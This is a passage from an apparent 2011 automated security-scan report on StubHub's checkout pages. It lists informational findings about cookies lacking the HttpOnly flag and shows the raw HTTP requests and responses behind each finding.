STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:43:10 GMT
Server: Apache
Set-Cookie: TLTHID=EE39049C39C11039003090BE30AA5CCD; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: eaed#e752/help/services/popUp@srwp01myx005.stubprod.com
com-stubhub-dye: eaed#e752/help/services/popUp@srwp01myx005.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://buy.stubhub.com/errorAjax.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


4.5. https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:53 GMT
Server: Apache
Set-Cookie: TLTHID=E3D5265C39C1103900D58A80A84B62C0; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: bc79#182/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null@srwp01byx009.stubprod.com
com-stubhub-dye: bc79#182/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null@srwp01byx009.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://www.stubhub.com/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


4.6. https://buy.stubhub.com/checkout/assets/default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/assets/default.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/assets/default.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=CD83878639C1103903C3B0044C7300DA; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}

Response

HTTP/1.1 404 Not Found
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Set-Cookie: TLTHID=CEBCC36039C11039A5D3871236610E4F; Path=/; Domain=.stubhub.com
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=1600
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /checkout/assets/default.css was not found on this se
...[SNIP]...

4.7. https://buy.stubhub.com/checkout/checkoutsignin.signin.signinform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.signinform

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/checkoutsignin.signin.signinform HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:52 GMT
Server: Apache
Set-Cookie: TLTHID=E2F6699439C1103903A6999880D0EEFC; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 17d2#1991/checkout/checkoutsignin.signin.signinform@srwp01byx002.stubprod.com
com-stubhub-dye: 17d2#1991/checkout/checkoutsignin.signin.signinform@srwp01byx002.stubprod.com
Location: https://www.stubhub.com/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


4.8. https://buy.stubhub.com/checkout/resources/mojito/css/common/stubtool.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/resources/mojito/css/common/stubtool.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/resources/mojito/css/common/stubtool.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=FBAC0A8439C11039000B8921C8DA47EC; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":9,"to":5,"c":"https://buy.stubhub.com/checkout/checkout","lc":{"d1":{"v":9,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856625066,"l":"en","i":-1}

Response

HTTP/1.1 404 Not Found
Date: Wed, 16 Feb 2011 11:44:28 GMT
Server: Apache
Set-Cookie: TLTHID=1C7871DA39C21039A743871236610E4F; Path=/; Domain=.stubhub.com
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=1598
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /checkout/resources/mojito/css/common/stubtool.css wa
...[SNIP]...

4.9. https://buy.stubhub.com/checkout/services/delivery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/delivery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/services/delivery HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; 